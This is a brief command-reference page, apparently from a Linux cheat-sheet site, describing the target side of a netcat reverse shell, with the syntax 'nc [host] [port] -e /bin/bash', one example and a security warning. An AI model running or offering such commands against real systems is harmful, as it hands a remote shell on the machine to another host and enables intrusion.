>_ linuxcommand.dev
Startseite Reverse Shell Victim
Netcat

Reverse Shell Victim

Target machine for reverse shell.

Syntax
$nc [host] [port] -e /bin/bash
Examples
Examples
$nc -nvp 3888 -e /bin/bash
Warnings
Security risk!
Typical use cases
Reverse Shell Target
nc host port -e /bin/bash
Note Reverse Shell (Target)
Export